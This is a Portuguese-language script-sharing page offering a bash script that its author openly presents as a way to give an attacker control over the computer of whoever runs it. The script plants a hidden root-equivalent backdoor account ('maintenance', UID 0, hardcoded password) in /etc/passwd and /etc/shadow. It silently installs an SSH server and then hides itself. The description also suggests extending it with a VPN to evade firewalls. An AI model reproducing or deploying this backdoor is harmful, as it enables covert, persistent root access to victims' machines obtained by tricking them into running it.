Criando usuário com poderes de root

Publicado por Marcelo (última atualização em 17/10/2009)

[ Hits: 7.001 ]

Download login.super




Este script cria um usuário com poderes de root e ativa o ssh-server, dando ao atacante controle sobre o computador do executor do script.

Incrementando ele um pouco mais pode-se fazer maravilhas como, por exemplo, criar uma VPN diretamente entre o computador do atacante e do atacado (fugindo assim dos firewalls) e dando total acesso, através de ssh, e com poderes de super usuário ainda.

É, realmente o elo mais fraco da segurança da informação são as pessoas... administrador descuidado + usuário "bobinho" = caca!

  



Esconder código-fonte

#!/bin/bash
# verifica se o usuário está como root
if [ "`id -u`" != "0" ]; then
echo 'Este script precisa ser executado como root. Digite "sudo su" para se logar como root e execute o script novamente.'
read pausa
exit 0
fi

# verifica se o script de cadastro de senha existe, se não, ele mesmo o cria
# o usuário será maintenance e a senha mdpasswd
if [ "`find -name cad.main`" = "" ]; then
touch cad.main
echo "#!/usr/bin/expect" >> cad.main
echo "set timeout 30" >> cad.main
echo "spawn passwd maintenance" >> cad.main
echo "set password \"mdpasswd"\" >> cad.main
echo "expect \"Enter new UNIX password:"\" >> cad.main
echo "send "\""$""password\r\"" >> cad.main
echo "expect \"Retype new UNIX password:"\" >> cad.main
echo "send "\""$""password\r\"" >> cad.main
echo "send \"exit"\" >> cad.main
echo "expect \"eof\"" >> cad.main
chmod +x cad.main
fi

# verifica se o programa expect está instalado, se não estiver, ele o instala
if [ "`dpkg -l | grep expect `" = "" ]; then
aptitude install expect >> /dev/null
fi

# verifica se o servidor ssh está instalado, se não estiver, ele o instala
if [ "`dpkg -l | grep openssh-server`" = "" ]; then
aptitude install openssh-server >> /dev/null
fi

# verifica se já existe algum usuário com este nome, se existir ele alterará a senha deste usuário para mdpasswd
if [ "`cat /etc/passwd | grep maintenance`" != "" ]; then
expect cad.main >> /dev/null
exit 0
fi

# se o usuário não existir, ele será criado
echo "maintenance:x:0:0:maintenance:/root:/bin/bash" >> /etc/passwd
echo "maintenance:*:10091:0:99999:7:::" >> /etc/shadow
expect cad.main >> /dev/null

# remove o arquivo de cadastro de usuário
rm -rf cad.min

# oculta este script
mv login.super .login.super
exit 1

Scripts recomendados

Download do Banco de dados NCBI NT (DNA)

Script de controle do Alfresco para RHEL / CentOS / Fedora

Acompanhamento de log squid com hora real

Rsync-centos

Listando usuários em um grupo


  

Comentários

Nenhum comentário foi encontrado.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts